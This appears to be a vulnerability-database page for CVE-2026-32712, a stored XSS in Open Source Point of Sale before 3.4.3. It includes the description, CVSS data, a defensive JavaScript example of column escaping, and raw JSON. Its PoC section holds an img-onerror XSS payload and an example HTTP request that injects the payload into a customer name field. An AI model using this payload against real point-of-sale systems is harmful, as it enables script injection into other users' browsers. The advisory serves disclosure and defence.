Security Vulnerability Report
CVE-2026-32712 CVSS 5.4 MEDIUM

CVE-2026-32712

Published: 2026-04-07 21:17:16
Last Modified: 2026-04-14 18:45:18

Description

Open Source Point of Sale is a web-based point-of-sale application written in PHP using the CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3.
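The escape option the description refers to decides, per column, whether bootstrap-table inserts a cell value verbatim or entity-encodes it first. The following is an added example written for this page, not code from OSPOS or from bootstrap-table: a minimal model of that per-column decision, the vulnerable column list beside the hardened one, and a small audit helper that flags columns still set to render raw HTML. The renderer, the sale_id and total column names, and the sample row are assumptions for illustration; only customer_name and the escape option come from the advisory.

```javascript
// Added example (not OSPOS's or bootstrap-table's own code): a minimal model of
// how a column's `escape` option controls whether user-supplied text such as a
// customer name reaches the page as markup or as text.

// Entity-encode the characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Render one cell as its column config dictates: `escape: false` emits the
// value verbatim (the vulnerable behaviour), `escape: true` encodes it first.
function renderCell(value, column) {
  const content = column.escape ? escapeHtml(value) : String(value);
  return `<td>${content}</td>`;
}

// Render a whole table row from a row object and a column list.
function renderRow(row, columns) {
  return `<tr>${columns.map(c => renderCell(row[c.field], c)).join('')}</tr>`;
}

// Column configuration as the advisory describes the Daily Sales table:
// customer_name is rendered as raw HTML. The other field names are assumed.
const vulnerableColumns = [
  { field: 'sale_id', title: 'Sale', escape: true },
  { field: 'customer_name', title: 'Customer', escape: false },
  { field: 'total', title: 'Total', escape: true },
];

// Hardened configuration: every column that can carry user-supplied text escapes.
const fixedColumns = vulnerableColumns.map(c => ({ ...c, escape: true }));

// Constructed sample row: a customer record whose name carries markup, as a
// record edited through the customer management screen could.
const sampleRow = {
  sale_id: 17,
  customer_name: '<b>Jane</b> Doe',
  total: '12.50',
};

// Config audit: names of columns that would inject raw HTML into the page.
function unescapedColumns(columns) {
  return columns.filter(c => !c.escape).map(c => c.field);
}

// Stand-alone run: show the same row rendered both ways and the audit result.
console.log(renderRow(sampleRow, vulnerableColumns));
console.log(renderRow(sampleRow, fixedColumns));
console.log('columns rendering raw HTML:', unescapedColumns(vulnerableColumns));
```

With the vulnerable column list the row contains `<b>Jane</b> Doe` as live markup, so any element or event-handler attribute placed in a customer name would be interpreted by the browser; with escape set on every column the same value is rendered as the literal text `&lt;b&gt;Jane&lt;/b&gt; Doe`. The audit helper is the check a reviewer can run over a table's column definitions to confirm nothing user-controlled is left at escape: false.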

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:* - VULNERABLE
Open Source Point of Sale < 3.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Payload to be injected into the customer name field (e.g., first_name or last_name)
// This payload displays an alert box to confirm vulnerability execution
var xssPayload = '<img src=x onerror=alert(\'CVE-2026-32712\')>';

/* Example HTTP Request to exploit the vulnerability:

POST /index.php/customers/save/1 HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded
Cookie: [Attacker's Session Cookie]

first_name=<img src=x onerror=alert('CVE-2026-32712')>&last_name=Doe&[email protected]&...
*/

References

https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32712", "sourceIdentifier": "[email protected]", "published": "2026-04-07T21:17:16.430", "lastModified": "2026-04-14T18:45:18.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.3", "matchCriteriaId": "33CA1AD1-86E9-4A57-8D1D-48AC5FEA0AE8"}]}]}], "references": [{"url": "https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}